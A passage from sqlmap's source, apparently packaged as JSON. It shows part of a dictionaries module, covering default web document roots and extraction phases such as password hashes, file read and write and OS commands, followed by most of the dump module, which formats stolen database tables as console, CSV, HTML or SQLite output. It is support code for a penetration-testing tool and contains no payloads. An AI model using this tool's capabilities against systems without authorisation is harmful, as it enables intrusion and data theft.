\"--check-waf\": None,\n    \"--pickled-options\": \"use '--api -c ...' instead\",\n    \"--identify-waf\": \"functionality being done automatically\",\n}\n\nDEPRECATED_OPTIONS = {\n}\n\nDUMP_DATA_PREPROCESS = {\n    DBMS.ORACLE: {\"XMLTYPE\": \"(%s).getStringVal()\"},  # Reference: https://www.tibcommunity.com/docs/DOC-3643\n    DBMS.MSSQL: {\"IMAGE\": \"CONVERT(VARBINARY(MAX),%s)\"},\n}\n\nDEFAULT_DOC_ROOTS = {\n    OS.WINDOWS: (\"C:/xampp/htdocs/\", \"C:/wamp/www/\", \"C:/Inetpub/wwwroot/\"),\n    OS.LINUX: (\"/var/www/\", \"/var/www/html\", \"/var/www/htdocs\", \"/usr/local/apache2/htdocs\", \"/usr/local/www/data\", \"/var/apache2/htdocs\", \"/var/www/nginx-default\", \"/srv/www/htdocs\", \"/usr/local/var/www\")  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout\n}\n\nPART_RUN_CONTENT_TYPES = {\n    \"checkDbms\": CONTENT_TYPE.TECHNIQUES,\n    \"getFingerprint\": CONTENT_TYPE.DBMS_FINGERPRINT,\n    \"getBanner\": CONTENT_TYPE.BANNER,\n    \"getCurrentUser\": CONTENT_TYPE.CURRENT_USER,\n    \"getCurrentDb\": CONTENT_TYPE.CURRENT_DB,\n    \"getHostname\": CONTENT_TYPE.HOSTNAME,\n    \"isDba\": CONTENT_TYPE.IS_DBA,\n    \"getUsers\": CONTENT_TYPE.USERS,\n    \"getPasswordHashes\": CONTENT_TYPE.PASSWORDS,\n    \"getPrivileges\": CONTENT_TYPE.PRIVILEGES,\n    \"getRoles\": CONTENT_TYPE.ROLES,\n    \"getDbs\": CONTENT_TYPE.DBS,\n    \"getTables\": CONTENT_TYPE.TABLES,\n    \"getColumns\": CONTENT_TYPE.COLUMNS,\n    \"getSchema\": CONTENT_TYPE.SCHEMA,\n    \"getCount\": CONTENT_TYPE.COUNT,\n    \"dumpTable\": CONTENT_TYPE.DUMP_TABLE,\n    \"search\": CONTENT_TYPE.SEARCH,\n    \"sqlQuery\": CONTENT_TYPE.SQL_QUERY,\n    \"tableExists\": CONTENT_TYPE.COMMON_TABLES,\n    \"columnExists\": CONTENT_TYPE.COMMON_COLUMNS,\n    \"readFile\": CONTENT_TYPE.FILE_READ,\n    \"writeFile\": CONTENT_TYPE.FILE_WRITE,\n    \"osCmd\": CONTENT_TYPE.OS_CMD,\n    \"regRead\": CONTENT_TYPE.REG_READ\n}\n\n# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html\n\nHTML_ENTITIES = {\n    \"quot\": 34,\n    \"amp\": 38,\n    \"apos\": 39,\n    \"lt\": 60,\n    \"gt\": 62,\n    \"nbsp\": 160,\n    \"iexcl\": 161,\n    \"cent\": 162,\n    \"pound\": 163,\n    \"curren\": 164,\n    \"yen\": 165,\n    \"brvbar\": 166,\n    \"sect\": 167,\n    \"uml\": 168,\n    \"copy\": 169,\n    \"ordf\": 170,\n    \"laquo\": 171,\n    \"not\": 172,\n    \"shy\": 173,\n    \"reg\": 174,\n    \"macr\": 175,\n    \"deg\": 176,\n    \"plusmn\": 177,\n    \"sup2\": 178,\n    \"sup3\": 179,\n    \"acute\": 180,\n    \"micro\": 181,\n    \"para\": 182,\n    \"middot\": 183,\n    \"cedil\": 184,\n    \"sup1\": 185,\n    \"ordm\": 186,\n    \"raquo\": 187,\n    \"frac14\": 188,\n    \"frac12\": 189,\n    \"frac34\": 190,\n    \"iquest\": 191,\n    \"Agrave\": 192,\n    \"Aacute\": 193,\n    \"Acirc\": 194,\n    \"Atilde\": 195,\n    \"Auml\": 196,\n    \"Aring\": 197,\n    \"AElig\": 198,\n    \"Ccedil\": 199,\n    \"Egrave\": 200,\n    \"Eacute\": 201,\n    \"Ecirc\": 202,\n    \"Euml\": 203,\n    \"Igrave\": 204,\n    \"Iacute\": 205,\n    \"Icirc\": 206,\n    \"Iuml\": 207,\n    \"ETH\": 208,\n    \"Ntilde\": 209,\n    \"Ograve\": 210,\n    \"Oacute\": 211,\n    \"Ocirc\": 212,\n    \"Otilde\": 213,\n    \"Ouml\": 214,\n    \"times\": 215,\n    \"Oslash\": 216,\n    \"Ugrave\": 217,\n    \"Uacute\": 218,\n    \"Ucirc\": 219,\n    \"Uuml\": 220,\n    \"Yacute\": 221,\n    \"THORN\": 222,\n    \"szlig\": 223,\n    \"agrave\": 224,\n    \"aacute\": 225,\n    \"acirc\": 226,\n    \"atilde\": 227,\n    \"auml\": 228,\n    \"aring\": 229,\n    \"aelig\": 230,\n    \"ccedil\": 231,\n    \"egrave\": 232,\n    \"eacute\": 233,\n    \"ecirc\": 234,\n    \"euml\": 235,\n    \"igrave\": 236,\n    \"iacute\": 237,\n    \"icirc\": 238,\n    \"iuml\": 239,\n    \"eth\": 240,\n    \"ntilde\": 241,\n    \"ograve\": 242,\n    \"oacute\": 243,\n    \"ocirc\": 244,\n    \"otilde\": 245,\n    \"ouml\": 246,\n    \"divide\": 247,\n    \"oslash\": 248,\n    \"ugrave\": 249,\n    \"uacute\": 250,\n    \"ucirc\": 251,\n    \"uuml\": 252,\n    \"yacute\": 253,\n    \"thorn\": 254,\n    \"yuml\": 255,\n    \"OElig\": 338,\n    \"oelig\": 339,\n    \"Scaron\": 352,\n    \"fnof\": 402,\n    \"scaron\": 353,\n    \"Yuml\": 376,\n    \"circ\": 710,\n    \"tilde\": 732,\n    \"Alpha\": 913,\n    \"Beta\": 914,\n    \"Gamma\": 915,\n    \"Delta\": 916,\n    \"Epsilon\": 917,\n    \"Zeta\": 918,\n    \"Eta\": 919,\n    \"Theta\": 920,\n    \"Iota\": 921,\n    \"Kappa\": 922,\n    \"Lambda\": 923,\n    \"Mu\": 924,\n    \"Nu\": 925,\n    \"Xi\": 926,\n    \"Omicron\": 927,\n    \"Pi\": 928,\n    \"Rho\": 929,\n    \"Sigma\": 931,\n    \"Tau\": 932,\n    \"Upsilon\": 933,\n    \"Phi\": 934,\n    \"Chi\": 935,\n    \"Psi\": 936,\n    \"Omega\": 937,\n    \"alpha\": 945,\n    \"beta\": 946,\n    \"gamma\": 947,\n    \"delta\": 948,\n    \"epsilon\": 949,\n    \"zeta\": 950,\n    \"eta\": 951,\n    \"theta\": 952,\n    \"iota\": 953,\n    \"kappa\": 954,\n    \"lambda\": 955,\n    \"mu\": 956,\n    \"nu\": 957,\n    \"xi\": 958,\n    \"omicron\": 959,\n    \"pi\": 960,\n    \"rho\": 961,\n    \"sigmaf\": 962,\n    \"sigma\": 963,\n    \"tau\": 964,\n    \"upsilon\": 965,\n    \"phi\": 966,\n    \"chi\": 967,\n    \"psi\": 968,\n    \"omega\": 969,\n    \"thetasym\": 977,\n    \"upsih\": 978,\n    \"piv\": 982,\n    \"bull\": 8226,\n    \"hellip\": 8230,\n    \"prime\": 8242,\n    \"Prime\": 8243,\n    \"oline\": 8254,\n    \"frasl\": 8260,\n    \"ensp\": 8194,\n    \"emsp\": 8195,\n    \"thinsp\": 8201,\n    \"zwnj\": 8204,\n    \"zwj\": 8205,\n    \"lrm\": 8206,\n    \"rlm\": 8207,\n    \"ndash\": 8211,\n    \"mdash\": 8212,\n    \"lsquo\": 8216,\n    \"rsquo\": 8217,\n    \"sbquo\": 8218,\n    \"ldquo\": 8220,\n    \"rdquo\": 8221,\n    \"bdquo\": 8222,\n    \"dagger\": 8224,\n    \"Dagger\": 8225,\n    \"permil\": 8240,\n    \"lsaquo\": 8249,\n    \"rsaquo\": 8250,\n    \"euro\": 8364,\n    \"weierp\": 8472,\n    \"image\": 8465,\n    \"real\": 8476,\n    \"trade\": 8482,\n    \"alefsym\": 8501,\n    \"larr\": 8592,\n    \"uarr\": 8593,\n    \"rarr\": 8594,\n    \"darr\": 8595,\n    \"harr\": 8596,\n    \"crarr\": 8629,\n    \"lArr\": 8656,\n    \"uArr\": 8657,\n    \"rArr\": 8658,\n    \"dArr\": 8659,\n    \"hArr\": 8660,\n    \"forall\": 8704,\n    \"part\": 8706,\n    \"exist\": 8707,\n    \"empty\": 8709,\n    \"nabla\": 8711,\n    \"isin\": 8712,\n    \"notin\": 8713,\n    \"ni\": 8715,\n    \"prod\": 8719,\n    \"sum\": 8721,\n    \"minus\": 8722,\n    \"lowast\": 8727,\n    \"radic\": 8730,\n    \"prop\": 8733,\n    \"infin\": 8734,\n    \"ang\": 8736,\n    \"and\": 8743,\n    \"or\": 8744,\n    \"cap\": 8745,\n    \"cup\": 8746,\n    \"int\": 8747,\n    \"there4\": 8756,\n    \"sim\": 8764,\n    \"cong\": 8773,\n    \"asymp\": 8776,\n    \"ne\": 8800,\n    \"equiv\": 8801,\n    \"le\": 8804,\n    \"ge\": 8805,\n    \"sub\": 8834,\n    \"sup\": 8835,\n    \"nsub\": 8836,\n    \"sube\": 8838,\n    \"supe\": 8839,\n    \"oplus\": 8853,\n    \"otimes\": 8855,\n    \"perp\": 8869,\n    \"sdot\": 8901,\n    \"lceil\": 8968,\n    \"rceil\": 8969,\n    \"lfloor\": 8970,\n    \"rfloor\": 8971,\n    \"lang\": 9001,\n    \"rang\": 9002,\n    \"loz\": 9674,\n    \"spades\": 9824,\n    \"clubs\": 9827,\n    \"hearts\": 9829,\n    \"diams\": 9830\n}\n"
  },
  {
    "path": "sqlmap/lib/core/dump.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport hashlib\nimport os\nimport re\nimport shutil\nimport tempfile\nimport threading\n\nfrom lib.core.common import Backend\nfrom lib.core.common import checkFile\nfrom lib.core.common import dataToDumpFile\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import filterNone\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import normalizeUnicode\nfrom lib.core.common import openFile\nfrom lib.core.common import prioritySortColumns\nfrom lib.core.common import randomInt\nfrom lib.core.common import safeCSValue\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getConsoleLength\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.convert import htmlEscape\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.dicts import DUMP_REPLACEMENTS\nfrom lib.core.enums import CONTENT_STATUS\nfrom lib.core.enums import CONTENT_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import DUMP_FORMAT\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.replication import Replication\nfrom lib.core.settings import DUMP_FILE_BUFFER_SIZE\nfrom lib.core.settings import HTML_DUMP_CSS_STYLE\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE\nfrom lib.core.settings import TRIM_STDOUT_DUMP_SIZE\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT\nfrom lib.core.settings import VERSION_STRING\nfrom lib.core.settings import WINDOWS_RESERVED_NAMES\nfrom lib.utils.safe2bin import safechardecode\nfrom thirdparty import six\nfrom thirdparty.magic import magic\n\nclass Dump(object):\n    \"\"\"\n    This class defines methods used to parse and output the results\n    of SQL injection actions\n    \"\"\"\n\n    def __init__(self):\n        self._outputFile = None\n        self._outputFP = None\n        self._lock = threading.Lock()\n\n    def _write(self, data, newline=True, console=True, content_type=None):\n        text = \"%s%s\" % (data, \"\\n\" if newline else \" \")\n\n        if conf.api:\n            dataToStdout(data, contentType=content_type, status=CONTENT_STATUS.COMPLETE)\n\n        elif console:\n            dataToStdout(text)\n\n        if self._outputFP:\n            multiThreadMode = kb.multiThreadMode\n            if multiThreadMode:\n                self._lock.acquire()\n\n            try:\n                self._outputFP.write(text)\n            except IOError as ex:\n                errMsg = \"error occurred while writing to log file ('%s')\" % getSafeExString(ex)\n                raise SqlmapGenericException(errMsg)\n\n            if multiThreadMode:\n                self._lock.release()\n\n        kb.dataOutputFlag = True\n\n    def flush(self):\n        if self._outputFP:\n            try:\n                self._outputFP.flush()\n            except IOError:\n                pass\n\n    def setOutputFile(self):\n        if conf.noLogging:\n            self._outputFP = None\n            return\n\n        self._outputFile = os.path.join(conf.outputPath, \"log\")\n        try:\n            self._outputFP = openFile(self._outputFile, \"ab\" if not conf.flushSession else \"wb\")\n        except IOError as ex:\n            errMsg = \"error occurred while opening log file ('%s')\" % getSafeExString(ex)\n            raise SqlmapGenericException(errMsg)\n\n    def singleString(self, data, content_type=None):\n        self._write(data, content_type=content_type)\n\n    def string(self, header, data, content_type=None, sort=True):\n        if conf.api:\n            self._write(data, content_type=content_type)\n\n        if isListLike(data) and len(data) == 1:\n            data = unArrayizeValue(data)\n\n        if isListLike(data):\n            self.lister(header, data, content_type, sort)\n        elif data is not None:\n            _ = getUnicode(data)\n\n            if _.endswith(\"\\r\\n\"):\n                _ = _[:-2]\n\n            elif _.endswith(\"\\n\"):\n                _ = _[:-1]\n\n            if _.strip(' '):\n                _ = _.strip(' ')\n\n            if \"\\n\" in _:\n                self._write(\"%s:\\n---\\n%s\\n---\" % (header, _))\n            else:\n                self._write(\"%s: %s\" % (header, (\"'%s'\" % _) if isinstance(data, six.string_types) else _))\n\n    def lister(self, header, elements, content_type=None, sort=True):\n        if elements and sort:\n            try:\n                elements = set(elements)\n                elements = list(elements)\n                elements.sort(key=lambda _: _.lower() if hasattr(_, \"lower\") else _)\n            except:\n                pass\n\n        if conf.api:\n            self._write(elements, content_type=content_type)\n\n        if elements:\n            self._write(\"%s [%d]:\" % (header, len(elements)))\n\n        for element in elements:\n            if isinstance(element, six.string_types):\n                self._write(\"[*] %s\" % element)\n            elif isListLike(element):\n                self._write(\"[*] \" + \", \".join(getUnicode(e) for e in element))\n\n        if elements:\n            self._write(\"\")\n\n    def banner(self, data):\n        self.string(\"banner\", data, content_type=CONTENT_TYPE.BANNER)\n\n    def currentUser(self, data):\n        self.string(\"current user\", data, content_type=CONTENT_TYPE.CURRENT_USER)\n\n    def currentDb(self, data):\n        if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):\n            self.string(\"current database (equivalent to schema on %s)\" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)\n        elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO):\n            self.string(\"current database (equivalent to owner on %s)\" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)\n        else:\n            self.string(\"current database\", data, content_type=CONTENT_TYPE.CURRENT_DB)\n\n    def hostname(self, data):\n        self.string(\"hostname\", data, content_type=CONTENT_TYPE.HOSTNAME)\n\n    def dba(self, data):\n        self.string(\"current user is DBA\", data, content_type=CONTENT_TYPE.IS_DBA)\n\n    def users(self, users):\n        self.lister(\"database management system users\", users, content_type=CONTENT_TYPE.USERS)\n\n    def statements(self, statements):\n        self.lister(\"SQL statements\", statements, content_type=CONTENT_TYPE.STATEMENTS)\n\n    def userSettings(self, header, userSettings, subHeader, content_type=None):\n        self._areAdmins = set()\n\n        if isinstance(userSettings, (tuple, list, set)):\n            self._areAdmins = userSettings[1]\n            userSettings = userSettings[0]\n\n        users = [_ for _ in userSettings.keys() if _ is not None]\n        users.sort(key=lambda _: _.lower() if hasattr(_, \"lower\") else _)\n\n        if conf.api:\n            self._write(userSettings, content_type=content_type)\n\n        if userSettings:\n            self._write(\"%s:\" % header)\n\n        for user in users:\n            settings = filterNone(userSettings[user])\n\n            if isNoneValue(settings):\n                stringSettings = \"\"\n            else:\n                stringSettings = \" [%d]:\" % len(settings)\n\n            if user in self._areAdmins:\n                self._write(\"[*] %s (administrator)%s\" % (user, stringSettings))\n            else:\n                self._write(\"[*] %s%s\" % (user, stringSettings))\n\n            if settings:\n                settings.sort()\n\n                for setting in settings:\n                    self._write(\"    %s: %s\" % (subHeader, setting))\n\n        if userSettings:\n            self.singleString(\"\")\n\n    def dbs(self, dbs):\n        self.lister(\"available databases\", dbs, content_type=CONTENT_TYPE.DBS)\n\n    def dbTables(self, dbTables):\n        if isinstance(dbTables, dict) and len(dbTables) > 0:\n            if conf.api:\n                self._write(dbTables, content_type=CONTENT_TYPE.TABLES)\n\n            maxlength = 0\n\n            for tables in dbTables.values():\n                for table in tables:\n                    if table and isListLike(table):\n                        table = table[0]\n\n                    maxlength = max(maxlength, getConsoleLength(unsafeSQLIdentificatorNaming(getUnicode(table))))\n\n            lines = \"-\" * (int(maxlength) + 2)\n\n            for db, tables in dbTables.items():\n                tables = sorted(filter(None, tables))\n\n                self._write(\"Database: %s\" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else \"<current>\")\n\n                if len(tables) == 1:\n                    self._write(\"[1 table]\")\n                else:\n                    self._write(\"[%d tables]\" % len(tables))\n\n                self._write(\"+%s+\" % lines)\n\n                for table in tables:\n                    if table and isListLike(table):\n                        table = table[0]\n\n                    table = unsafeSQLIdentificatorNaming(table)\n                    blank = \" \" * (maxlength - getConsoleLength(getUnicode(table)))\n                    self._write(\"| %s%s |\" % (table, blank))\n\n                self._write(\"+%s+\\n\" % lines)\n        elif dbTables is None or len(dbTables) == 0:\n            self.singleString(\"No tables found\", content_type=CONTENT_TYPE.TABLES)\n        else:\n            self.string(\"tables\", dbTables, content_type=CONTENT_TYPE.TABLES)\n\n    def dbTableColumns(self, tableColumns, content_type=None):\n        if isinstance(tableColumns, dict) and len(tableColumns) > 0:\n            if conf.api:\n                self._write(tableColumns, content_type=content_type)\n\n            for db, tables in tableColumns.items():\n                if not db:\n                    db = \"All\"\n\n                for table, columns in tables.items():\n                    maxlength1 = 0\n                    maxlength2 = 0\n\n                    colType = None\n\n                    colList = list(columns.keys())\n                    colList.sort(key=lambda _: _.lower() if hasattr(_, \"lower\") else _)\n\n                    for column in colList:\n                        colType = columns[column]\n\n                        column = unsafeSQLIdentificatorNaming(column)\n                        maxlength1 = max(maxlength1, len(column or \"\"))\n                        maxlength2 = max(maxlength2, len(colType or \"\"))\n\n                    maxlength1 = max(maxlength1, len(\"COLUMN\"))\n                    lines1 = \"-\" * (maxlength1 + 2)\n\n                    if colType is not None:\n                        maxlength2 = max(maxlength2, len(\"TYPE\"))\n                        lines2 = \"-\" * (maxlength2 + 2)\n\n                    self._write(\"Database: %s\\nTable: %s\" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else \"<current>\", unsafeSQLIdentificatorNaming(table)))\n\n                    if len(columns) == 1:\n                        self._write(\"[1 column]\")\n                    else:\n                        self._write(\"[%d columns]\" % len(columns))\n\n                    if colType is not None:\n                        self._write(\"+%s+%s+\" % (lines1, lines2))\n                    else:\n                        self._write(\"+%s+\" % lines1)\n\n                    blank1 = \" \" * (maxlength1 - len(\"COLUMN\"))\n\n                    if colType is not None:\n                        blank2 = \" \" * (maxlength2 - len(\"TYPE\"))\n\n                    if colType is not None:\n                        self._write(\"| Column%s | Type%s |\" % (blank1, blank2))\n                        self._write(\"+%s+%s+\" % (lines1, lines2))\n                    else:\n                        self._write(\"| Column%s |\" % blank1)\n                        self._write(\"+%s+\" % lines1)\n\n                    for column in colList:\n                        colType = columns[column]\n\n                        column = unsafeSQLIdentificatorNaming(column)\n                        blank1 = \" \" * (maxlength1 - len(column))\n\n                        if colType is not None:\n                            blank2 = \" \" * (maxlength2 - len(colType))\n                            self._write(\"| %s%s | %s%s |\" % (column, blank1, colType, blank2))\n                        else:\n                            self._write(\"| %s%s |\" % (column, blank1))\n\n                    if colType is not None:\n                        self._write(\"+%s+%s+\\n\" % (lines1, lines2))\n                    else:\n                        self._write(\"+%s+\\n\" % lines1)\n\n    def dbTablesCount(self, dbTables):\n        if isinstance(dbTables, dict) and len(dbTables) > 0:\n            if conf.api:\n                self._write(dbTables, content_type=CONTENT_TYPE.COUNT)\n\n            maxlength1 = len(\"Table\")\n            maxlength2 = len(\"Entries\")\n\n            for ctables in dbTables.values():\n                for tables in ctables.values():\n                    for table in tables:\n                        maxlength1 = max(maxlength1, getConsoleLength(getUnicode(table)))\n\n            for db, counts in dbTables.items():\n                self._write(\"Database: %s\" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else \"<current>\")\n\n                lines1 = \"-\" * (maxlength1 + 2)\n                blank1 = \" \" * (maxlength1 - len(\"Table\"))\n                lines2 = \"-\" * (maxlength2 + 2)\n                blank2 = \" \" * (maxlength2 - len(\"Entries\"))\n\n                self._write(\"+%s+%s+\" % (lines1, lines2))\n                self._write(\"| Table%s | Entries%s |\" % (blank1, blank2))\n                self._write(\"+%s+%s+\" % (lines1, lines2))\n\n                sortedCounts = list(counts.keys())\n                sortedCounts.sort(reverse=True)\n\n                for count in sortedCounts:\n                    tables = counts[count]\n\n                    if count is None:\n                        count = \"Unknown\"\n\n                    tables.sort(key=lambda _: _.lower() if hasattr(_, \"lower\") else _)\n\n                    for table in tables:\n                        blank1 = \" \" * (maxlength1 - getConsoleLength(getUnicode(table)))\n                        blank2 = \" \" * (maxlength2 - len(str(count)))\n                        self._write(\"| %s%s | %d%s |\" % (table, blank1, count, blank2))\n\n                self._write(\"+%s+%s+\\n\" % (lines1, lines2))\n        else:\n            logger.error(\"unable to retrieve the number of entries for any table\")\n\n    def dbTableValues(self, tableValues):\n        replication = None\n        rtable = None\n        dumpFP = None\n        appendToFile = False\n        warnFile = False\n\n        if tableValues is None:\n            return\n\n        db = tableValues[\"__infos__\"][\"db\"]\n        if not db:\n            db = \"All\"\n        table = tableValues[\"__infos__\"][\"table\"]\n\n        if conf.api:\n            self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)\n\n        try:\n            dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db))\n        except UnicodeError:\n            try:\n                dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db)))\n            except (UnicodeError, OSError):\n                tempDir = tempfile.mkdtemp(prefix=\"sqlmapdb\")\n                warnMsg = \"currently unable to use regular dump directory. \"\n                warnMsg += \"Using temporary directory '%s' instead\" % tempDir\n                logger.warning(warnMsg)\n\n                dumpDbPath = tempDir\n\n        if conf.dumpFormat == DUMP_FORMAT.SQLITE:\n            replication = Replication(os.path.join(conf.dumpPath, \"%s.sqlite3\" % unsafeSQLIdentificatorNaming(db)))\n        elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):\n            if not os.path.isdir(dumpDbPath):\n                try:\n                    os.makedirs(dumpDbPath)\n                except:\n                    warnFile = True\n\n                    _ = re.sub(r\"[^\\w]\", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))\n                    dumpDbPath = os.path.join(conf.dumpPath, \"%s-%s\" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8]))\n\n                    if not os.path.isdir(dumpDbPath):\n                        try:\n                            os.makedirs(dumpDbPath)\n                        except Exception as ex:\n                            tempDir = tempfile.mkdtemp(prefix=\"sqlmapdb\")\n                            warnMsg = \"unable to create dump directory \"\n                            warnMsg += \"'%s' (%s). \" % (dumpDbPath, getSafeExString(ex))\n                            warnMsg += \"Using temporary directory '%s' instead\" % tempDir\n                            logger.warning(warnMsg)\n\n                            dumpDbPath = tempDir\n\n            dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, \"%s.%s\" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))\n            if not checkFile(dumpFileName, False):\n                try:\n                    openFile(dumpFileName, \"w+b\").close()\n                except SqlmapSystemException:\n                    raise\n                except:\n                    warnFile = True\n\n                    _ = re.sub(r\"[^\\w]\", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))\n                    if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:\n                        _ = re.sub(r\"[^\\w]\", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))\n                        dumpFileName = os.path.join(dumpDbPath, \"%s-%s.%s\" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower()))\n                    else:\n                        dumpFileName = os.path.join(dumpDbPath, \"%s.%s\" % (_, conf.dumpFormat.lower()))\n            else:\n                appendToFile = any((conf.limitStart, conf.limitStop))\n\n                if not appendToFile:\n                    count = 1\n                    while True:\n                        candidate = \"%s.%d\" % (dumpFileName, count)\n                        if not checkFile(candidate, False):\n                            try:\n                                shutil.copyfile(dumpFileName, candidate)\n                            except IOError:\n                                pass\n                            break\n                        else:\n                            count += 1\n\n            dumpFP = openFile(dumpFileName, \"wb\" if not appendToFile else \"ab\", buffering=DUMP_FILE_BUFFER_SIZE)\n\n        count = int(tableValues[\"__infos__\"][\"count\"])\n        separator = str()\n        field = 1\n        fields = len(tableValues) - 1\n\n        columns = prioritySortColumns(list(tableValues.keys()))\n\n        if conf.col:\n            cols = conf.col.split(',')\n            columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)\n\n        for column in columns:\n            if column != \"__infos__\":\n                info = tableValues[column]\n                lines = \"-\" * (int(info[\"length\"]) + 2)\n                separator += \"+%s\" % lines\n\n        separator += \"+\"\n        self._write(\"Database: %s\\nTable: %s\" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else \"<current>\", unsafeSQLIdentificatorNaming(table)))\n\n        if conf.dumpFormat == DUMP_FORMAT.SQLITE:\n            cols = []\n\n            for column in columns:\n                if column != \"__infos__\":\n                    colType = Replication.INTEGER\n\n                    for value in tableValues[column]['values']:\n                        try:\n                            if not value or value == \" \":  # NULL\n                                continue\n\n                            int(value)\n                        except ValueError:\n                            colType = None\n                            break\n\n                    if colType is None:\n                        colType = Replication.REAL\n\n                        for value in tableValues[column]['values']:\n                            try:\n                                if not value or value == \" \":  # NULL\n                                    continue\n\n                                float(value)\n                            except ValueError:\n                                colType = None\n                                break\n\n                    cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT))\n\n            rtable = replication.createTable(table, cols)\n        elif conf.dumpFormat == DUMP_FORMAT.HTML:\n            dataToDumpFile(dumpFP, \"<!DOCTYPE html>\\n<html>\\n<head>\\n\")\n            dataToDumpFile(dumpFP, \"<meta http-equiv=\\\"Content-type\\\" content=\\\"text/html;charset=%s\\\">\\n\" % UNICODE_ENCODING)\n            dataToDumpFile(dumpFP, \"<meta name=\\\"generator\\\" content=\\\"%s\\\" />\\n\" % VERSION_STRING)\n            dataToDumpFile(dumpFP, \"<title>%s</title>\\n\" % (\"%s%s\" % (\"%s.\" % db if METADB_SUFFIX not in db else \"\", table)))\n            dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)\n            dataToDumpFile(dumpFP, \"\\n</head>\\n<body>\\n<table>\\n<thead>\\n<tr>\\n\")\n\n        if count == 1:\n            self._write(\"[1 entry]\")\n        else:\n            self._write(\"[%d entries]\" % count)\n\n        self._write(separator)\n\n        for column in columns:\n            if column != \"__infos__\":\n                info = tableValues[column]\n\n                column = unsafeSQLIdentificatorNaming(column)\n                maxlength = int(info[\"length\"])\n                blank = \" \" * (maxlength - getConsoleLength(column))\n\n                self._write(\"| %s%s\" % (column, blank), newline=False)\n\n                if not appendToFile:\n                    if conf.dumpFormat == DUMP_FORMAT.CSV:\n                        if field == fields:\n                            dataToDumpFile(dumpFP, \"%s\" % safeCSValue(column))\n                        else:\n                            dataToDumpFile(dumpFP, \"%s%s\" % (safeCSValue(column), conf.csvDel))\n                    elif conf.dumpFormat == DUMP_FORMAT.HTML:\n                        dataToDumpFile(dumpFP, \"<th>%s</th>\" % getUnicode(htmlEscape(column).encode(\"ascii\", \"xmlcharrefreplace\")))\n\n                field += 1\n\n        if conf.dumpFormat == DUMP_FORMAT.HTML:\n            dataToDumpFile(dumpFP, \"\\n</tr>\\n</thead>\\n<tbody>\\n\")\n\n        self._write(\"|\\n%s\" % separator)\n\n        if conf.dumpFormat == DUMP_FORMAT.CSV:\n            dataToDumpFile(dumpFP, \"\\n\" if not appendToFile else \"\")\n\n        elif conf.dumpFormat == DUMP_FORMAT.SQLITE:\n            rtable.beginTransaction()\n\n        if count > TRIM_STDOUT_DUMP_SIZE:\n            warnMsg = \"console output will be trimmed to \"\n            warnMsg += \"last %d rows due to \" % TRIM_STDOUT_DUMP_SIZE\n            warnMsg += \"large table size\"\n            logger.warning(warnMsg)\n\n        for i in xrange(count):\n            console = (i >= count - TRIM_STDOUT_DUMP_SIZE)\n            field = 1\n            values = []\n\n            if conf.dumpFormat == DUMP_FORMAT.HTML:\n                dataToDumpFile(dumpFP, \"<tr>\")\n\n            for column in columns:\n                if column != \"__infos__\":\n                    info = tableValues[column]\n\n                    if len(info[\"values\"]) <= i:\n                        continue\n\n                    if info[\"values\"][i] is None:\n                        value = u''\n                    else:\n                        value = getUnicode(info[\"values\"][i])\n                        value = DUMP_REPLACEMENTS.get(value, value)\n\n                    values.append(value)\n                    maxlength = int(info[\"length\"])\n                    blank = \" \" * (maxlength - getConsoleLength(value))\n                    self._write(\"| %s%s\" % (value, blank), 